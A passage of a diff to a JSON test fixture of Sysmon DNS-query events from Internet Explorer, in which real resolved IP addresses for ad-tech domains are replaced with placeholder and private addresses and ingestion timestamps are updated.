dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.693Z", 
@@ -13579,39 +13424,39 @@
 "type": "CNAME"
 },
 {
- "data": "52.55.160.246",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "3.211.67.240",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "35.173.61.59",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "34.233.179.235",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "34.228.105.237",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "52.7.23.213",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "52.201.177.113",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "34.235.70.251",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "192.5.6.30",
+ "data": "192.168.6.30",
 "type": "A"
 },
 {
@@ -13619,7 +13464,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.33.14.30",
+ "data": "192.168.14.30",
 "type": "A"
 },
 {
@@ -13628,17 +13473,17 @@
 }
 ],
 "resolved_ip": [
- "52.55.160.246",
- "3.211.67.240",
- "35.173.61.59",
- "34.233.179.235",
- "34.228.105.237",
- "52.7.23.213",
- "52.201.177.113",
- "34.235.70.251",
- "192.5.6.30",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30"
 ]
 },
@@ -13655,24 +13500,17 @@ "match.sharethrough.com" ], "ip": [ - "52.55.160.246", - "3.211.67.240", - "35.173.61.59", - "34.233.179.235", - "34.228.105.237", - "52.7.23.213", - "52.201.177.113", - "34.235.70.251", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742146400Z", + "ingested": "2021-12-09T13:50:23.457352Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693070300Z'/\u003e\u003cEventRecordID\u003e158\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.534\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sharethrough.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
match-us-east-1.sharethrough.com;::ffff:52.55.160.246;::ffff:3.211.67.240;::ffff:35.173.61.59;::ffff:34.233.179.235;::ffff:34.228.105.237;::ffff:52.7.23.213;::ffff:52.201.177.113;::ffff:34.235.70.251;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693070300Z'/\u003e\u003cEventRecordID\u003e158\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.534\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sharethrough.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
match-us-east-1.sharethrough.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "provider": "Microsoft-Windows-Sysmon",
 "kind": "event",
 "created": "2019-07-18T03:34:04.693Z",
@@ -13732,11 +13570,11 @@
 },
 "answers": [
 {
- "data": "35.241.16.233",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "192.5.6.30",
+ "data": "192.168.6.30",
 "type": "A"
 },
 {
@@ -13744,7 +13582,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.33.14.30",
+ "data": "192.168.14.30",
 "type": "A"
 },
 {
@@ -13752,7 +13590,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.26.92.30",
+ "data": "192.168.92.30",
 "type": "A"
 },
 {
@@ -13760,7 +13598,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.31.80.30",
+ "data": "192.168.80.30",
 "type": "A"
 },
 {
@@ -13768,7 +13606,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.12.94.30",
+ "data": "192.168.94.30",
 "type": "A"
 },
 {
@@ -13777,16 +13615,16 @@
 }
 ],
 "resolved_ip": [
- "35.241.16.233",
- "192.5.6.30",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30",
+ "192.168.92.30",
 "2001:503:83eb::30",
- "192.31.80.30",
+ "192.168.80.30",
 "2001:500:856e::30",
- "192.12.94.30",
+ "192.168.94.30",
 "2001:502:1ca1::30"
 ]
 },
@@ -13802,23 +13640,23 @@ "tags.rd.linksynergy.com" ], "ip": [ - "35.241.16.233", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742150700Z", + "ingested": "2021-12-09T13:50:23.457357900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836591400Z'/\u003e\u003cEventRecordID\u003e159\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.601\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.rd.linksynergy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:35.241.16.233;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836591400Z'/\u003e\u003cEventRecordID\u003e159\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.601\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.rd.linksynergy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "provider": "Microsoft-Windows-Sysmon",
 "kind": "event",
 "created": "2019-07-18T03:34:04.836Z",
@@ -13886,11 +13724,11 @@
 "type": "CNAME"
 },
 {
- "data": "199.187.193.166",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "192.5.6.30",
+ "data": "192.168.6.30",
 "type": "A"
 },
 {
@@ -13898,7 +13736,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.33.14.30",
+ "data": "192.168.14.30",
 "type": "A"
 },
 {
@@ -13906,7 +13744,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.26.92.30",
+ "data": "192.168.92.30",
 "type": "A"
 },
 {
@@ -13914,19 +13752,19 @@
 "type": "AAAA"
 },
 {
- "data": "192.31.80.30",
+ "data": "192.168.80.30",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "199.187.193.166",
- "192.5.6.30",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30",
+ "192.168.92.30",
 "2001:503:83eb::30",
- "192.31.80.30"
+ "192.168.80.30"
 ]
 },
 "network": {
@@ -13943,20 +13781,20 @@ "rtb-csync.smartadserver.com" ], "ip": [ - "199.187.193.166", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742156600Z", + "ingested": "2021-12-09T13:50:23.457363700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836608300Z'/\u003e\u003cEventRecordID\u003e160\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.604\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb-csync.smartadserver.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:199.187.193.166;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836608300Z'/\u003e\u003cEventRecordID\u003e160\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.604\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb-csync.smartadserver.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.836Z", 
@@ -14020,11 +13858,11 @@
 "type": "CNAME"
 },
 {
- "data": "199.166.0.200",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "192.5.6.30",
+ "data": "192.168.6.30",
 "type": "A"
 },
 {
@@ -14032,7 +13870,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.33.14.30",
+ "data": "192.168.14.30",
 "type": "A"
 },
 {
@@ -14040,7 +13878,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.26.92.30",
+ "data": "192.168.92.30",
 "type": "A"
 },
 {
@@ -14048,7 +13886,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.31.80.30",
+ "data": "192.168.80.30",
 "type": "A"
 },
 {
@@ -14056,21 +13894,21 @@
 "type": "AAAA"
 },
 {
- "data": "192.12.94.30",
+ "data": "192.168.94.30",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "199.166.0.200",
- "192.5.6.30",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30",
+ "192.168.92.30",
 "2001:503:83eb::30",
- "192.31.80.30",
+ "192.168.80.30",
 "2001:500:856e::30",
- "192.12.94.30"
+ "192.168.94.30"
 ]
 },
 "network": {
@@ -14086,22 +13924,22 @@ "sc.iasds01.com" ], "ip": [ - "199.166.0.200", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742161500Z", + "ingested": "2021-12-09T13:50:23.457369600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836626600Z'/\u003e\u003cEventRecordID\u003e161\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.621\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esc.iasds01.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.sc.iasds01.com;::ffff:199.166.0.200;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836626600Z'/\u003e\u003cEventRecordID\u003e161\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.621\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esc.iasds01.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.sc.iasds01.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.836Z", 
@@ -14165,11 +14003,11 @@
 "type": "CNAME"
 },
 {
- "data": "104.244.38.20",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "192.5.6.30",
+ "data": "192.168.6.30",
 "type": "A"
 },
 {
@@ -14177,7 +14015,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.33.14.30",
+ "data": "192.168.14.30",
 "type": "A"
 },
 {
@@ -14185,7 +14023,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.26.92.30",
+ "data": "192.168.92.30",
 "type": "A"
 },
 {
@@ -14193,7 +14031,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.31.80.30",
+ "data": "192.168.80.30",
 "type": "A"
 },
 {
@@ -14201,21 +14039,21 @@
 "type": "AAAA"
 },
 {
- "data": "192.12.94.30",
+ "data": "192.168.94.30",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "104.244.38.20",
- "192.5.6.30",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30",
+ "192.168.92.30",
 "2001:503:83eb::30",
- "192.31.80.30",
+ "192.168.80.30",
 "2001:500:856e::30",
- "192.12.94.30"
+ "192.168.94.30"
 ]
 },
 "network": {
@@ -14231,22 +14069,22 @@ "dt.adsafeprotected.com" ], "ip": [ - "104.244.38.20", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742169100Z", + "ingested": "2021-12-09T13:50:23.457375400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034646400Z'/\u003e\u003cEventRecordID\u003e162\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edt.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
sjedt.adsafeprotected.com;::ffff:104.244.38.20;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034646400Z'/\u003e\u003cEventRecordID\u003e162\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edt.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sjedt.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "provider": "Microsoft-Windows-Sysmon",
 "kind": "event",
 "created": "2019-07-18T03:34:05.034Z",
@@ -14314,12 +14152,12 @@
 "type": "CNAME"
 },
 {
- "data": "72.21.91.29",
